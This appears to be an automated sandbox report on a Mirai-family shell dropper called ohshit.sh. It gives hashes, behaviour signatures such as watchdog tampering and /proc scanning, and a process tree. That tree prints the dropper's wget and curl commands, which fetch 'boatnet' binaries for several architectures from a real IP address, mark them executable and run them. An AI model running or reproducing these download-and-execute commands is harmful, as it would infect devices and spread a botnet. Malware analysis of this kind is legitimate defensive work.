Analysis
-
max time kernel
59s -
max time network
61s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
31-08-2024 21:05
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
ohshit.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral7
Sample
ohshit.sh
Resource
ubuntu2004-amd64-20240729-en
Behavioral task
behavioral8
Sample
ohshit.sh
Resource
ubuntu2204-amd64-20240611-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
fefdf2b7ece4d55bd47778b420f84011
-
SHA1
2823096e0538910f9b57ff9bae007ec655520fc3
-
SHA256
3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
-
SHA512
b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21
Malware Config
Extracted
mirai
LZRD
Signatures
-
Executes dropped EXE 5 IoCs
ioc pid Process /tmp/WTF 1585 WTF /tmp/WTF 1594 WTF /tmp/WTF 1604 WTF /tmp/WTF 1613 WTF /tmp/WTF 1622 WTF -
Modifies Watchdog functionality 1 TTPs 10 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF -
resource yara_rule behavioral8/files/fstream-1.dat upx -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 1 TTPs 10 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/633/status WTF File opened for reading /proc/629/status WTF File opened for reading /proc/90/status WTF File opened for reading /proc/101/status WTF File opened for reading /proc/110/status WTF File opened for reading /proc/1243/status WTF File opened for reading /proc/1601/status WTF File opened for reading /proc/646/status WTF File opened for reading /proc/697/status WTF File opened for reading /proc/94/status WTF File opened for reading /proc/411/status WTF File opened for reading /proc/697/status WTF File opened for reading /proc/209/status WTF File opened for reading /proc/1197/status WTF File opened for reading /proc/987/status WTF File opened for reading /proc/697/status WTF File opened for reading /proc/1642/status WTF File opened for reading /proc/1657/status WTF File opened for reading /proc/405/status WTF File opened for reading /proc/1669/status WTF File opened for reading /proc/12/status WTF File opened for reading /proc/119/status WTF File opened for reading /proc/1451/status WTF File opened for reading /proc/1586/status WTF File opened for reading /proc/86/status WTF File opened for reading /proc/82/status WTF File opened for reading /proc/1077/status WTF File opened for reading /proc/1091/status WTF File opened for reading /proc/1199/status WTF File opened for reading /proc/1586/status WTF File opened for reading /proc/1159/status WTF File opened for reading /proc/1638/status WTF File opened for reading /proc/1091/status WTF File opened for reading /proc/102/status WTF File opened for reading /proc/871/status WTF File opened for reading /proc/1147/status WTF File opened for reading /proc/1077/status WTF File opened for reading /proc/96/status WTF File opened for reading /proc/1056/status WTF File opened for reading /proc/1607/status WTF File opened for reading /proc/1655/status WTF File opened for reading /proc/1665/status WTF File opened for reading /proc/13/status WTF File opened for reading /proc/95/status WTF File opened for reading /proc/1310/status WTF File opened for reading /proc/1666/status WTF File opened for reading /proc/4/status WTF File opened for reading /proc/1647/status WTF File opened for reading /proc/1675/status WTF File opened for reading /proc/1652/status WTF File opened for reading /proc/1662/status WTF File opened for reading /proc/835/status WTF File opened for reading /proc/1188/status WTF File opened for reading /proc/1249/status WTF File opened for reading /proc/98/status WTF File opened for reading /proc/1641/status WTF File opened for reading /proc/1243/status WTF File opened for reading /proc/1635/status WTF File opened for reading /proc/1652/status WTF File opened for reading /proc/609/status WTF File opened for reading /proc/224/status WTF File opened for reading /proc/705/status WTF File opened for reading /proc/1223/status WTF File opened for reading /proc/7/status WTF -
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.x86_64 wget
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:1570 -
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1571
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1582
-
-
/usr/bin/catcat boatnet.x862⤵PID:1583
-
-
/usr/bin/chmodchmod +x WTF boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t2⤵PID:1584
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1585
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.mips2⤵
- Writes file to tmp directory
PID:1589
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.mips2⤵
- Writes file to tmp directory
PID:1591
-
-
/usr/bin/chmodchmod +x WTF boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t2⤵PID:1593
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1594
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1598
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1600
-
-
/usr/bin/chmodchmod +x WTF boatnet.arc boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t2⤵PID:1603
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1604
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.i4682⤵PID:1608
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.i4682⤵
- Writes file to tmp directory
PID:1610
-
-
/usr/bin/chmodchmod +x WTF boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t2⤵PID:1612
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1613
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.i6862⤵PID:1617
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.i6862⤵
- Writes file to tmp directory
PID:1619
-
-
/usr/bin/chmodchmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t2⤵PID:1621
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1622
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:1626
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5ba2cb5b8715ba94c39e24e75a34d0ea0
SHA17182bf3b0e14e5224e741c15174c6e93f00df444
SHA25601fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA5120c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d